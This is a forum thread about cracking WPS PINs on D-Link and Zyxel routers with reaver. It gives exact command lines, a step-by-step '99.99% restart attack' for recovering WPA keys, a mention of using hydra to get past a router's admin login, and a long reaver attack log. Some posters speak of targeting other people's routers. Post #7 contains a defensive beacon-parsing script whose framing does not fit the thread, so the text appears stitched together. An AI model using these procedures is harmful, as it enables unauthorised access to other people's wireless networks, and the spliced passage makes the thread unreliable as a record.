Thread: Cracking 6C:19:8F D-Link Router with reaver and defeating the 99.99% problem.

  1. #1

    Cracking 6C:19:8F D-Link Router with reaver and defeating the 99.99% problem.

    First attempts at cracking this D-Link Router with Reaver seemed to be blocked by the firmware. Note the RSSI was 67, so signal strength was not an issue. We tried:

    reaver -i mon0 -a -f -c 13 -b 6C:19:8F:XX:XX:XX -vv --mac=00:11:22:33:44:55

    The router would provide two (2) or three (3) PINs and then freeze for a long period.


    Next we employed the command line:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -S -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    Pin harvesting was good, but the router ran up to 99.99% and spun at that number, requesting PINs endlessly. We started a new session and ran it up to 99.99% twice more with the same results.

    After a rethink we focused on the -S (dh-small) option. We removed the -S, -a and -f from the command line and ran:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    Removing the -a forced reaver to ask if we wanted to restore the previous session. We selected n, i.e. NO.

    We got the key in one (1) pass, BUT the WPS key was 12345670 according to reaver. This intrigued us, so we logged onto the router using the WPA key provided by reaver, got association, then hacked past the router's login page with hydra and went straight to the WPS page:

    1. The WPS system was active.
    2. The WPS mode was Enrollee.
    3. No WPS PIN was seen.

    This may mean that:

    1. D-Link routers in enrollee mode might be hacked by running through the PINs to 99.99% using dh-small, then removing the -S and -a, which will force reaver to ask if you want to restore the old session. Say no and run the attack again.

    OR

    2. Just running the command line:

    reaver -i mon0 -b 6C:19:8F:XX:XX:XX -E -vv -T 1 -t 20 -d 0 -l 420 -x 30 -r 2:30 --mac=00:11:22:33:44:55

    against this router if in enrollee mode will crack the code in one iteration.

    MTC
    Last edited by mmusket33; 2014-08-28 at 01:21.

  2. #2
    The D-Link 99:99% Restart Attack with Reaver

    Musket Team have successfully cracked a second D-Link router C0:A0:BB:XX:XX:XX thus replicating the procedures previously outlined.

    This router was unresponsive to reaver attacks until we used the following command line:

    reaver -i mon0 -c 1 -b C0:A0:BB:XX:XX:XX -S -E -vv -N -T 1 -t 20 -d 0 -l 420 -x 30 --mac=00:11:22:33:44:55

    Pin harvest was very slow, so we used varmacreaversav99.2.sh. The pin count jumped to 91% but then took 5 days to go to 99.99%. At that point the pin request switched to 1234 and spun endlessly at that number. We let it spin for a few hours, then stopped varmacreaversav992.sh and switched to the command line.

    We removed the -S, i.e. use small DH keys:

    reaver -i mon0 -c 1 -b C0:A0:BB:XX:XX:XX -E -vv -N -T 1 -t 20 -d 0 -l 420 -x 30 --mac=00:11:22:33:44:55

    When the program asked to restore the previous session we said n, i.e. NO, start a new attack. Reaver sent the pin request 12345670 and immediately cracked the code.

    We call this reaver attack the D-Link 99.99% restart attack.

    Here is what we know at present.

    For some unresponsive D-Link routers:

    1. Use the command line in step one above and slowly harvest pins till you obtain 99.99%.

    2. Let the 99.99% spin endlessly for a while.

    3. In both successful attacks the pin requests dropped to four digits or 1234 after a time.

    4. Stop the attack.

    5. Remove the -S from the command line.

    6. Restart and, when asked to restore the previous session, say n ("NO"). If the attack works you will get the WPS key almost immediately and the WPS code will be 12345670.

    Varmacreaversav992.sh is not central to the success of this attack. If the program allows faster harvesting of pins, use it. If not, just use the command line. We always try the command line first and move on from there.


    MTeams
    Last edited by mmusket33; 2014-09-15 at 04:05.

  3. #3
    This worked for me! But what I want to ask is: if I were to want the password again, which WPS PIN should I use? Should I try to get the WPA key using PIN 12345670?

  4. #4
    Put the WPS pin in the reaver command line, i.e. add --pin=12345670 or whatever pin you found. The owner could change the WPS pin. If this does not work, start a new reaver session and brute force the WPA key again. You could always try the new pixiedust attack. It only takes a few minutes once you set up the programs. Read the pixie dust threads in these forums.

    MTeams

  5. #5
    Very interesting... I'll be on the lookout for D-Link routers.

    List the models and chipsets vulnerable to this, please.

    I ran across a D-Link that supports WPS, but it doesn't have a WPS button. The WPS button is virtual, on the router's homepage. There was no set PIN from the factory; the WPS PIN is created at the time the customer wants to pair a new device. Before I knew this I spent time on pixiewps, then brute-forcing --- failed.
    Model: D-Link 2750B
    Last edited by nuroo; 2015-04-23 at 16:37.

  6. #6
    Hi Musket Team. Could you please help me...

    I am using Kali Linux 1.1.0, reaver 1.5 and Bully (latest Git). The problem is that Reaver is not working with most of the Zyxel brand routers, even though WPS is enabled. I tried reaver and bully on my friend's router and I get nothing, just "WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))", and after some time, when it successfully associates, I get an EAPOL warning and sometimes "WPS transaction error". The interesting thing is that I tried reaver on three Zyxel routers with the same result, and all these routers' manufacturing date is 2009-2010 (when the WPS flaw had not gone public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx brands. So can someone explain to me why this is not working with these brands? And also help me to resolve this issue. (See the output below and the links for my bully output and WPS settings screenshot.)

    http://i.imgur.com/NngbBZ7.png
    http://i.imgur.com/uSdk9wE.png


    reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    [+] Waiting for beacon from F4:3E:61:9C:80:xx
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [+] Switching mon0 to channel 11
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m8s.
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m15s.
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    Thanks in Advance..

  7. #7
    Look in the beacon frames in wireshark to see if WPS is even configured. The GUI and the beacons tell a different story.
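    The beacon check suggested above, as an added example that is not from the thread: this parses the tagged parameters of a beacon frame, finds the WPS vendor-specific information element, and reports what the AP actually advertises (WPS state and whether PIN-based setup is locked), which is the fact a network owner wants when auditing whether their own AP still exposes WPS regardless of what the GUI shows. The beacon bytes and the SSID are constructed here; the attribute IDs are the standard WSC ones.

```python
import struct

# Vendor-specific IE (tag 0xDD) carrying WPS: Microsoft OUI 00:50:F2, type 0x04
WPS_IE_PREFIX = b"\x00\x50\xf2\x04"
ATTR_WPS_STATE = 0x1044        # WSC attribute: 1 = not configured, 2 = configured
ATTR_AP_SETUP_LOCKED = 0x1057  # WSC attribute: 1 = PIN-based setup locked by the AP

def iter_ies(tagged):
    """Yield (tag, value) for each 802.11 information element in the beacon's tagged parameters."""
    i = 0
    while i + 2 <= len(tagged):
        tag, length = tagged[i], tagged[i + 1]
        value = tagged[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        yield tag, value
        i += 2 + length

def parse_wsc_attrs(payload):
    """Parse WSC TLVs: big-endian 2-byte attribute id, 2-byte length, then the value."""
    attrs, i = {}, 0
    while i + 4 <= len(payload):
        aid, alen = struct.unpack(">HH", payload[i:i + 4])
        value = payload[i + 4:i + 4 + alen]
        if len(value) != alen:
            raise ValueError("truncated WSC attribute")
        attrs[aid] = value
        i += 4 + alen
    return attrs

def wps_status(tagged):
    """What the beacon itself says about WPS, independent of what the router GUI shows."""
    for tag, value in iter_ies(tagged):
        if tag == 0xDD and value.startswith(WPS_IE_PREFIX):
            attrs = parse_wsc_attrs(value[len(WPS_IE_PREFIX):])
            state = attrs.get(ATTR_WPS_STATE, b"\x00")[0]
            locked = attrs.get(ATTR_AP_SETUP_LOCKED, b"\x00")[0]
            return {"wps_advertised": True, "configured": state == 2, "setup_locked": locked == 1}
    return {"wps_advertised": False, "configured": False, "setup_locked": False}

# Constructed sample tagged parameters: SSID IE, then a WPS IE advertising configured + locked
SAMPLE_WITH_WPS = (
    b"\x00\x06TOILET"                      # SSID IE (tag 0, len 6); SSID taken from the output above
    + b"\xdd\x19" + WPS_IE_PREFIX          # vendor-specific IE, 25 bytes of payload
    + b"\x10\x4a\x00\x01\x10"              # Version: 1.0
    + b"\x10\x44\x00\x01\x02"              # WPS State: configured
    + b"\x10\x57\x00\x01\x01"              # AP Setup Locked: yes
    + b"\x10\x08\x00\x02\x00\x88"          # Config Methods
)
SAMPLE_WITHOUT_WPS = b"\x00\x06TOILET"   # same SSID, no WPS IE at all
```

Feed it the tagged-parameter bytes of a beacon exported from Wireshark (the portion after the fixed 12-byte beacon header) to see whether WPS is present and locked on the air.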

  8. #8
    Quote Originally Posted by soxrok2212 View Post
    Look in the beacon frames in wireshark to see if WPS is even configured. The GUI and the beacons tell a different story.
    Here is the Wireshark output. Please see this...

    http://www.fileconvoy.com/dfl.php?id...c452c189a6e471

  9. #9
    Thank you for your reply. Pixie dust does look very interesting and I will give it a try.
